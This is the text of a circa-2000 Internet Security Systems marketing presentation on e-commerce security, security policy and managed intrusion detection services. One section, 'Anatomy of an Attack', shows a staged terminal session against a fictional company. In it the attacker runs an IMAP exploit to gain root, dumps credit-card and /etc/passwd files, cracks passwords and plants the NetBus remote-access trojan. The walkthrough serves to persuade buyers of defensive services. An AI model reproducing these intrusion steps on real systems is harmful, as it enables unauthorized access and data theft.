Protecting The Digital Economy

David Gerulski
Director of Marketing
Internet Security Systems

Agenda
• Introduction
• E-Commerce Security Drivers
• Developing a Security Policy
• Anatomy of an Attack
• Policy Enforcement
• Enterprise Risk Management
• Security Resources
• Conclusion

ISS Overview
• Headquartered in Atlanta, GA, USA
• Pioneered vulnerability assessment and intrusion detection technology
• Leader in Enterprise Security Management
• Publicly traded on NASDAQ: ISSX
• Industry leading technology 35+ product awards
• 1,000+ employee owners worldwide
• Over 300 certified security partners
• Over 7,500 customers worldwide

ISS Market Share
Source: International Data Corporation (IDC), August 1999
[Charts: Network Vulnerability Assessment Market; Network Intrusion Detection Market; Network Intrusion Detection & Assessment Market]

E-Commerce Security Drivers

Business Is Changing
Source: Forrester Research, Inc.

Yesterday
• Internal Focus: Access is granted to employees only
• Centralized Assets: Applications and data are centralized in fortified IT bunkers
• Prevent Losses: The goal of security is to protect against confidentiality breaches
• IT Control: Security manager decides who gets access

Today
• External Focus: Suppliers, customers, and prospects all need some form of access
• Distributed Assets: Applications and data are distributed across servers, locations, and business units
• Generate Revenue: The goal of security is to enable eCommerce
• Business Control: Business units want the authority to grant access

The Threat Grows
Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey
[Bar chart by year (1996, 1997, 1998); bar labels: 38%, 47%, 54%]

The Internal Threat Is Real

E-Commerce Issues
Principal Business Drivers
• Increase Revenue
• Increase Profitability
Principal Security Drivers
• Greater Susceptibility to Attack
• Greater Probability of Catastrophic Consequences
• Much Greater “Loss to Incident” Ratio
Our Strength Is Our Weakness
• In Touch With Anyone With a Modem
• Have an International Presence
• Partners Can Now Collaborate
• Leverage Web-based Supply Chain Technologies
• Employees Can Work From Home, at Night, Over the Weekends, and on Holiday
• Application Servers Can Support Entire Divisions
Consequences
• Exposure to Legal Liability

DDoS: Distributed Denial-of-Service
[Network diagram labels: Router, Firewall, Web Server, UNIX and NT hosts; Company A, Company B, University A, Company C, Company D]
Consequences
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
• Exposure to legal liability
Consequences
• Decreased Employee Productivity
• Loss of Intellectual Property & Assets
• Inefficient Use of Resources
• Exposure to Legal Liability
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
Summary
• E-Business is here to stay
• Networks are exposed and under attack
• There’s no more turning a “blind eye”
• It’s a business issue and it should be treated in a business-like manner
• Implement a security program, not a security technology

Developing a Security Policy: A Blueprint for Success

Security Policy
• Blueprint for Good Security Program
• Standards Based - British Standard 7799
• Management Buy-In
• High Level to Technical
• Business Driven Not Vendor Driven
• Non-Static
Enforced Security Policy
• Minimize Exposure to Vulnerabilities
• Prepare for Attacks on Our Systems
• Manage Internal Staff Behavior
• Manage External Access and Activity
• Maintain Appropriate Security Configurations & Response Strategies
• Exploit Built-in Security Features
• Measure and Record Patterns and Trends for Future Security Planning

The Anatomy of an Attack

bigwidget.com

Registrant:
Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget Drive
Really Big, CA 90120
US

Domain Name: BIGWIDGET.COM

Administrative Contact, Technical Contact:
Simms, Haywood (HS69) [email protected]
1111 Big Widget Drive, UMIL04-07
Really Big, CA 90210
678-443-6001

Zone Contact, Billing Contact:
Dodge, Rodger (RD32) [email protected]
1111 Big Widget Drive, UMIL04-47
Really Big, CA 90210
678-443-6014

Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:
EHECATL.BIGWIDGET.COM 208.21.0.7
NS1-AUTH.SPRINTLINK.NET 206.228.179.10
NS.COMMANDCORP.COM 130.205.70.10

hacker:~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
Connection closed by foreign host.
hacker:~$ telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.

imap

hacker ~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.
hacker ~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
root
bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1 localhost localhost.localdomain
208.21.2.10 thevault accounting
208.21.2.11 fasttalk sales
208.21.2.12 geekspeak engineering
208.21.2.13 people human resources
208.21.2.14 thelinks marketing
208.21.2.15 thesource information systems
bigwidget:~# rlogin thevault
login:

thevault:~# cd /data/creditcards
thevault:~# cat visa.txt
Allan B. Smith 6543-2223-1209-4002 12/99
Donna D. Smith 6543-4133-0632-4572 06/98
Jim Smith 6543-2344-1523-5522 01/01
Joseph L.Smith 6543-2356-1882-7532 04/02
Kay L. Smith 6543-2398-1972-4532 06/03
Mary Ann Smith 6543-8933-1332-4222 05/01
Robert F. Smith 6543-0133-5232-3332 05/99
thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambob
username: mary password: mary
username: root password: ncc1701
thevault:~# ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.

ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit
thevault:~$ telnet thesource
Trying 208.21.2.160...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: administrator
password: *******
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\> cd \temp
C:\TEMP> netbus.exe

Connected to the.source.bigwidget.com
NetBus 1.6, by cf
Screendump
David Smith < [email protected] >
My Raise < URGENT >
Dear Mr. Smith
I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.
Your Son,
Dave
David Smith

Anatomy of the Attack
[Diagram: BigWidget’s Network. Labels: Router, Firewall, Web Server, E-Mail Server, UNIX and NT hosts, Clients & Workstations, Network. Attack steps marked: imap, Crack, NetBus]

Real World Web Page Defacements
New York Times

Policy Enforcement Through Detection and Response

What Is Vulnerable? IT Infrastructure
[Diagram labels: Firewall, E-Mail Server, Web Server, Router, Servers, Clients & Workstations, Network]

What Is Vulnerable? Applications
[Diagram labels: Router, E-Commerce Web Server, E-Mail Server, Firewall, SAP, Peoplesoft, Web Browsers]

What Is Vulnerable? Databases
[Diagram labels: Firewall, Router, Oracle, Microsoft SQL Server, Sybase]

What Is Vulnerable? Operating Systems
[Diagram labels: Firewall, AIX, Solaris, Router, Windows NT, Network, HP-UX, Windows 95 & NT]

What Is Vulnerable? Networks
[Diagram labels: Firewall, E-Mail Server, Web Server, Router, Servers, TCP/IP, Netware]

Enterprise Risk Management

Enterprise Security Management

Vulnerability Assessment Service
Corrective action report
Vulnerability: GetAdmin
Severity: High Risk
IP Address: 215.011.200.255
OS: Windows NT 4.0
Fix: From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.

Managed Intrusion Detection Service
[Diagram labels: EMAIL ALERT / LOG; ATTACK DETECTED; RECORD SESSION; SESSION TERMINATED; RECONFIGURE FIREWALL / ROUTER; INTERNAL ATTACK DETECTED; SESSION LOGGED]

Why a managed solution?
Reasons for firewall breach (Computer Security Institute Study 1998):
• Mismanagement: 49%
• Both: 44%
• Bad Technology: 7%

Why Outsource?
• Network Security Is Complex
• Requires Specialized Skills and Dedicated Resources
• Difficulty in Hiring, Maintaining and Retaining IT Security Staff
• High Costs of Doing It on Your Own

Managed Firewall Home Page

Firewall Security Policy

Firewall - Daily Logs

Web Usage Report

Intrusion Detection Daily Events

Intrusion Detection Custom - Query Entry Screen

Benefits of Using BellSouth’s Managed Security Services
• Enables organizations to establish and maintain security across the Internet, Intranet and Extranet
– Less expensive
  • Leverage an existing security infrastructure
  • Offers reliability and cost-effectiveness without having to maintain 24x7 dedicated security staff
  • Scalable and modular services enable increased flexibility to upgrade services as needed
– More Secure
  • Based on a robust and proven security architecture
  • Utilizes best of breed technologies
  • Supported by a dedicated staff of security engineers.
  • Proven operational procedures ensure proper response and escalation of security events
  • Round-the-clock real-time monitoring for full-time protection
  • All critical Internet-based security needs are addressed
– Frees up your resources to focus on other key company initiatives

BellSouth & ISS Value Proposition
• BellSouth
– Trusted Business Partner
– Operational Excellence
– Highest levels of Customer Satisfaction
• Internet Security Systems (ISS)
– Security Expertise
– Market leader in security
• Together
– Best in class IP access and network security solutions to support your E-Business strategy

Thank You!
For more information please join us at:
www.iss.net